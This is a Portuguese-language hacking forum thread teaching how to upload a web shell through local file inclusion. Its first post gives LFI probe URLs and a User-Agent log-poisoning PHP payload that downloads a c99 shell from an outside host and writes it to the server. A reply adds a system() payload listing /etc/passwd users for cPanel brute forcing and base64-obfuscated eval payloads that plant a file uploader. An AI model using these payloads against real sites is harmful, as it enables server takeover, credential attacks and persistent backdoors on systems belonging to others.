Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Upando shell por LFI

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Upando shell por LFI

    Vamos lá.

    Primeiro vou mostra um exemplo de código vulnerável:

    Código PHP:
    <?php
    // Código vulnerável a LFI
    $redirect $_GET['redirect'];
    include(
    $redirect);
    ?>
    é vulnerável por que o $redirect não está higienizado, portanto o include($redirect); irá ler diretamente de $_GET[page];

    Um exemplo de URL vulnerável.

    Código HTML:
    http://www.example.com/redirect.php?page=../../../etc/passwd
    para checar se é vulnerável a upload checamos o seguinte arquivo

    Código HTML:
    http://www.example.com/redirect.php?page=../../../proc/self/environ
    se tiver algo parecido com DOCUMENT_ROOT="blalblablablabla" é vulnerável.

    agora vamos precisar do tamper data, vamos lá.

    inicie o tamper data, e recarregue a página, e altere o user-agent para o seguinte código

    Código PHP:
    <?php $file fopen("shell.php","w+"); $stream fopen ("http://www.5njr.com/shells/c99.txt""r"); while(!feof($stream)) {
    $shell .=fgets($stream); } fwrite($file$shell); fclose($file);?>
    Caso você tenha outra shell upada em outro lugar em txt pode modificar a url pré definida.

    Pronto, é só acessar sua shell >
    Código HTML:
    www.example.com/shell.php
    <.


    Buh bye !
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.

  • Font Size
    #2
    Para dar uma ajuda aqui no tópico aqui também:

    Para filtrar os usuários para um futuro brute force no cpanel, (olhe pelo código fonte para facilitar a cópia dos resultados).
    <?php ob_clean; system("awk -F: '{ print $1 }' /etc/passwd | sort"); ?>
    base64
    <?
    eval(base64_decode('b2JfY2xlYW47IHN5c3RlbSgiYXdrIC 1GOiAneyBwcmludCAkMSB9JyAvZXRjL3Bhc3N3ZCB8IHNvcnQi KTs='));
    ?>
    Sem necessidade de Wget ON

    Basta colocar isso no User Agent e irá criar um uploader na própria página, após isso vc carrega uma shell no uploader que irá aparecer e altera o Tamper Data com o mesmo código.. resultado o arquivo que vc carregou no uploader será upado para o servidor e vc não precisou de wget.

    <?
    eval(base64_decode('ZWNobyAnPGI+PGJyPjxicj48YnI+PG JyPjxicj48YnI+PGNlbnRlcj48Zm9udCBjb2xvcjoiYmx1ZSI+ PHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiBtb25vc3BhY2U7Ij 48c3BhbiBzdHlsZT0iY29sb3I6IHJnYigyNTUsIDI1NSwgMjU1 KTsiPjxicj48YnI+PGZvbnQgY29sb3I9ImJsYWNrIj4nLnBocF 91bmFtZSgpLic8L2ZvbnQ+PGJyPjwvYj4nOyBlY2hvICc8Zm9y bSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdW x0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9 InVwbG9hZGVyIj4nOyBlY2hvICc8aW5wdXQgdHlwZT0iZmlsZS IgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJf dXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVX Bsb2FkIj48L2Zvcm0+JzsgaWYoICRfUE9TVFsnX3VwbCddID09 ICJVcGxvYWQiICkgeyBpZihAY29weSgkX0ZJTEVTWydmaWxlJ1 1bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSdd KSkgeyBlY2hvICc8Yj5BcnF1aXZvIHVwYWRvICEhITwvYj48Yn I+PGJyPic7IH0gZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWls ICEhITwvYj48YnI+PGJyPjwvZm9udD4nOyB9IH0='));
    ?>
    Para facilitar podem usar um Plugin do Firefox - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... assim não é necessário nem o Tamper Data.

    Espero ter contribuido com o tópico.

    Comment


    • Font Size
      #3
      Muito Bom!, Eu não Sabia que se Podia Injetar uma Shell assim!
      sigpic


      Patati Patacula, la vem o pato para ver o que Ha!!

      Comment

      X
      Working...
      X